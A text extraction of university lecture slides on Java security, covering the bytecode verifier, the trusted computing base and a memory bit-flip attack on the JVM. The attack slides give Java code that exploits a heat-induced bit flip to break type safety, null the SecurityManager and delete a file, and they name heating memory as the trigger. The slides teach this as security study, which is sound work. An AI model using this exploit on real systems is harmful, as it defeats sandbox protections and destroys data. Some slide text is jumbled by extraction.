cs2220: Engineering Software Class 21: Hair-Dryer Attacks Image

cs2220: Engineering Software Class 21: Hair-Dryer Attacks Image

cs2220: Engineering Software Class 21: Hair-Dryer Attacks Image from www.clean-funny.com, GoldenBlue LLC. Fall 2010 UVa David Evans Plan for Today Recap: Java Platform Security Trusted Computing Base: should we trust Javas? Hair-Dryer Attacks Project Design Documents Due: on paper, beginning of class Tuesday

1. A description of your project: what it will do and why it is useful, fun, or interesting. 2. A high-level description of your design, including a module dependency diagram showing the most important modules. 3. A description of your implementation and testing strategy including: how you will divide the work amongst your team how you will order the work to support incremental development how you will do unit testing and integration testing a list of milestones and a schedule for achieving them, leading to a completed project on December 7 4. A list of questions Schedule Design Review meetings (link on course site) Recap: Java Platform

malcode.java Java Source Code malcode.class javac Compiler JVML Object Code JavaVM if OK Alice User Bytecode Verifier

Running Mistyped Code .method public static main([Ljava/lang/String;)V iconst_2 istore_0 > java Simple aload_0 Exception in thread "main" java.lang.VerifyError: iconst_2 (class: Simple, method: main signature: iconst_3 ([Ljava/lang/String;)V) iadd Register 0 contains wrong type return > java noverify Simple .end method result: 5 Running Mistyped Code

.method public static main([Ljava/lang/String;)V > java noverify Simple ldc 2220 Unexpected Signal : EXCEPTION_ACCESS_VIOLATION (0xc0000005) occurred at PC=0x809DCEB istore_0 Function=JVM_FindSignal+0x1105F aload_0 Library=C:\j2sdk1.4.2\jre\bin\client\jvm.dll iconst_2 Current Java thread: iconst_3 at Simple.main(Simple.java:7) iadd # # HotSpot Virtual Machine Error : EXCEPTION_ACCESS_VIOLATION .end method # Error ID : 4F530E43505002EF

# Please report this error at # http://java.sun.com/cgi-bin/bugreport.cgi # # Java VM: Java HotSpot(TM) Client VM (1.4.2-b28 mixed mode) Recap: Trusted Computing Base malcode.java Java Source Code malcode.class javac Compiler JVML Object Code Trusted Computing Base

JavaVM if OK Alice User Policy Bytecode Verifier Trusted Computing Base The part of the system that must be trusted to behave correctly for the desired security properties to be guaranteed Should we trust the Java platform TCB? Building Trust Simplicity There are two ways of constructing a software design: One way is to make it so simple there are obviously no deficiencies and the other way is to make it so complicated that there are no obvious deficiencies. Tony Hoare

Extensive validation Design Process Boeing 787 Dreamliner delay conspiracy theories Rather, he thinks avionics software is hung up by the effects of the RTCA/DO-178b standard, which certifies avionics software and in his opinion causes unnecessary delays in the delivery of same. In yesterdays call, Boeing executives downplayed the avionics software lag, but conceded they welcome more time to test it. Verifier (should be) Conservative JVML programs Safe programs Verifiable programs (Slide from Nate Pauls ACSAC talk)

Complexity Increases Risk JVML programs Safe programs Verifiable programs Bug (Slide from Nate Pauls ACSAC talk) The Worst JVML Instruction jsr [branchbyte1] [branchbyte2] Operand Stack ... ..., address Description The address of the opcode of the instruction immediately following this jsr instruction is pushed onto the operand stack as a value of type returnAddress. The unsigned branchbyte1 and branchbyte2 are used to construct a signed 16-bit offset, where the offset is (branchbyte1 << 8) | branchbyte2. Execution proceeds at that offset from the address of this jsr

instruction. The target address must be that of an opcode of an instruction within the method that contains this jsr instruction. Notes Note that jsr pushes the address onto the operand stack and ret gets it out of a local variable. This asymmetry is intentional. http://java.sun.com/docs/books/vmspec/2nd-edition/html/Instructions2.doc7.html Try-Catch-Finally public class JSR { static public void main (String args[]) { try { System.out.println("hello"); } catch (Exception e) { System.out.println ("There was an exception!"); } finally { System.out.println ("I am finally here!"); } } } public class JSR {

Method void main(java.lang.String[]) static public void main (String args[]) { 0 getstatic #2 try { 3 ldc #3 System.out.println("hello"); } catch (Exception e) { 5 invokevirtual #4 System.out.println (... exception!"); 8 jsr 35 } finally { 11 goto 46 System.out.println ("I am finally"); 14 astore_1 } } 15 getstatic #2 } 18 ldc #6 20 invokevirtual #4 23 jsr 35

Exception table: 26 goto 46 from to target type 29 astore_2 0 8 14 30 jsr 35 0 11 29 any 33 aload_2 34 athrow 14 26 29 any 35 astore_3 29 33 29 any 36 getstatic #2 39 ldc #7 41 invokevirtual #4 44 ret 3 46 return Vulnerabilities in JavaVM Vulnerabilities Reported

45 40 35 30 25 20 15 10 5 0 0 July 1996 1 2 3

4 5 6 Years Since First Release 7 8 9 July 2005 From Nathanael Paul and David Evans, Comparing Java and .NET security: Lessons Learned and Missed, Computers & Security, 2006. http://www.cs.virginia.edu/~evans/pubs/cs06/ Where are They? Verification

API bugs Class loading Other or unknown Missing policy checks Configuration DoS attacks (crash, consumption) several of these were because of jsr complexity 12 10 8 2 3 4 5 Low-level vs. Policy Security Low-level Code Safety Type safety, memory safety, control flow safety Enforced by Java bytecode verifier and run-time checks in VM

Needed to prevent malcode from circumventing any policy mechanism Policy Security Control access and use of resources (files, network, display, etc.) Enforced by Java class Hard part is deciding on a good policy Is this really the whole TCB? malcode.java Java Source Code malcode.class javac Compiler JVML Object

Code Trusted Computing Base JavaVM if OK Alice User Policy Bytecode Verifier Bytecode Verifier Checks JVML code satisfies safety properties: Simulates program execution to know types are correct, but doesnt need to examine any instruction more than once After code is verified, it is trusted: is not checked for type safety at run time (except for casts, array stores)

Key assumption: when a value is written to a memory location, the value in that memory location is the same value when it is read. Violating the Assumption // The object on top of the stack is a SimObject astore_0 // There is a SimObject in location 0 aload_0 // The value on top of the stack is a SimObject If a cosmic ray hits the right bit of memory, between the astore and aload, the assumption might be wrong. Can you really blame cosmic rays when your program crashes? IBM estimate: one cosmicray bit error per 256 megabytes per month For people running big datacenters, this is a real

problem If your processor is in an airplane or in space risk is much higher But, can an attacker take advantage of this? Improving the Odds Set up memory so that a single bit error is likely to be exploitable Mistreat the hardware memory to increase the odds that bits will flip Following slides adapted (with permission) from Sudhakar Govindavajhala and Andrew W. Appel, Using Memory Errors to Attack a Virtual Machine, July 2003. Making Bit Flips Useful Fill up memory with Filler objects, and one Pointee object:

class Filler { Pointee a1; Pointee a2; Pointee a3; Pointee a4; Pointee a5; Pointee a6; Pointee a7; } } class Pointee { Pointee a1; Pointee a2; Filler f; int b; Pointee a5; Pointee a6; Pointee a7; a1

a3 a4 Pointee p = new Pointee (); ArrayList fillers = new ArrayList (); try { while (true) { Filler f = new Filler (); f.a1 = p; f.a2 = p; f.a3 = p; ; f.a7 =p; fillers.add (f); } } catch (OutOfMemoryException e) { ; } a5 a6 a7 a1 a2 f b a5

a6 a7 a1 Filler Object a2 a3 a4 Pointee Object Filling Up Memory Filler Object a2 a1 Wait for a bit flip

a3 a4 Remember: there are lots of Filler objects (fill up all of memory) When a bit flips, good chance (~70%) it will be in a field of a Filler object and it will now point to a Filler object instead of a Pointee object a5 Filler Object a2 a6 a7

a2 f b a5 a6 a7 a1 Filler Object a2 a3 a4 Pointee Object a1 a1 Type Violation

a3 a4 a5 After the bit flip, the value of f.a2 is a Filler object, but f.a2 was declared as a Pointee object! Filler Object a2 a6 a7 a2 f b a5 a6

Can an attacker exploit this? a7 a1 Filler Object a2 a3 a4 Pointee Object a1 Finding the Bit Flip Pointee p = new Pointee (); ArrayList fillers = new ArrayList (); try { while (true) { Filler f = new Filler ();

f.a1 = p; f.a2 = p; f.a3 = p; ; f.a7 =p; fillers.add (f); } } catch (OutOfMemoryException e) { ; } while (true) { for (Filler f : fillers) { } Finding the Bit Flip Pointee p = new Pointee (); ArrayList fillers = new ArrayList (); try { while (true) { Filler f = new Filler (); f.a1 = p; f.a2 = p; f.a3 = p; ; f.a7 =p; fillers.add (f); } } catch (OutOfMemoryException e) { ; }

while (true) { for (Filler f : fillers) { if (f.a1 != p) { // bit flipped! } else if (f.a2 != p) { } } Violating Type Safety class Filler { Pointee a1; Pointee a2; Pointee a3; Pointee a4; Pointee a5; Pointee a6; Pointee a7; }

class Pointee { Pointee a1; Pointee a2; Filler f; int b; Pointee a5; Pointee a6; Pointee a7; } Filler f = (Filler) e.nextElement (); if (f.a1 != p) { // bit flipped! Object r = f.a1; // Filler fr = (Filler) r; // Cast is checked at run-time Declared Type f.a1 Pointee f.a1.b int fr == f.a1

Filler fr.a4 == f.a1.b Pointee Violating Type Safety class Filler { Pointee a1; Pointee a2; Pointee a3; Pointee a4; Pointee a5; Pointee a6; Pointee a7; } class Pointee { Pointee a1; Pointee a2; Filler f;

int b; Pointee a5; Pointee a6; Pointee a7; } Filler f = (Filler) e.nextElement (); if (f.a1 != p) { // bit flipped! Object r = f.a1; Filler fr = (Filler) r; // Cast is checked at run-time f.a1.b = 1524383; // Address of the SecurityManager fr.a4.a1 = null; // Set it to a null // Do whatever you want! No security policy now new File (C:\thesis.doc).delete (); Getting a Bit Flip Wait for a Cosmic Ray You have to be really, really patient (or move machine out of Earths atmosphere)

X-Rays Expensive, not enough power to generate bit-flip High energy protons and neutrons Work great - but, you need a particle accelerator Hmm. Using Heat 50-watt spotlight bulb Between 80 -100C, memory starts to have a few failures Attack applet is successful (at least half the time)! Hairdryer works too, but it fries too many bits at once Picture from Sudhakar Govindavajhala

Should Anyone be Worried? Java virtual machine Recap Verifier assumes the value you write is the same value when you read it By flipping bits, we can violate this assumption By violating this assumption, we can violate type safety: get two references to the same storage that have inconsistent types By violating type safety, we can get around all other security measures Project Design Descriptions due Tuesday Sign up for design review meetings

Recently Viewed Presentations

  • 1ST PERIOD ANNOUNCEMENTS Scoreboard is back! Help me!

    1ST PERIOD ANNOUNCEMENTS Scoreboard is back! Help me!

    3) What is the point of view? How to Grill by Steven Raichlen. Once you have your grill assembled, the next thing to decide is where to put it. A grill puts out a lot of heat, so you should...
  • Bivalves - University of Washington

    Bivalves - University of Washington

    Senses: In many bivalves, the mantle margin has a sensory function and often possesses rows of parallel tentacles with tactile and chemosensory cells. In some species, the siphon tips may also possess such tentacles.
  • Towards an Information Literacy Continuum: examining the high ...

    Towards an Information Literacy Continuum: examining the high ...

    Towards an Information Literacy Continuum: examining the high school to college research transition. Chris Sweet- Illinois Wesleyan University. Dana Convery- Prairie Central High School. Amanda Pilgrim- Illinois Wesleyan University. Information Literacy Summit. Illinois State University. 4/20/10
  • Title of session

    Title of session

    Aims of the session. Discuss the Initial Audit against the Teachers' Standards. Give you information about personal tutor role and meetings. Discuss relevant paperwork
  • Hardware - WordPress.com

    Hardware - WordPress.com

    Objectives. BEGINNER: I. dentify . a Star and Mesh Topology. ADVANCED: Compare . Advantages and Disadvantages of Wi-Fi and Ethernet. EXPERT: Understand and explain what encryption is and why it is required. Task 1. 1. Draw a mesh network. Task...
  • Cost-effectiveness of PARP inhibitors as Maintenance Therapies in

    Cost-effectiveness of PARP inhibitors as Maintenance Therapies in

    In this slide, I am showing you the actual tree I constructed to model this problem, as you can see here, we are comparing 4 treatment options. This decision node is followed by the presence of absence of baseline pain...
  • Defending your Honors Project

    Defending your Honors Project

    wait! I'm Not Done Writing My Paper! Assess Progress with Director. If you're not ready, taking a third semester is the best option. Write. Incessantly -- Daily
  • EDU10003 The World of Maths - Home - Fiona Pidgeon

    EDU10003 The World of Maths - Home - Fiona Pidgeon

    EDU10003 The World of Maths. Assessment 1: Maths and numeracy in the real world. Fiona Pidgeon. Student ID: 657999X. Maths in the Real World. Maths is everywhere. We use maths in various ways without even being conscious of it. This...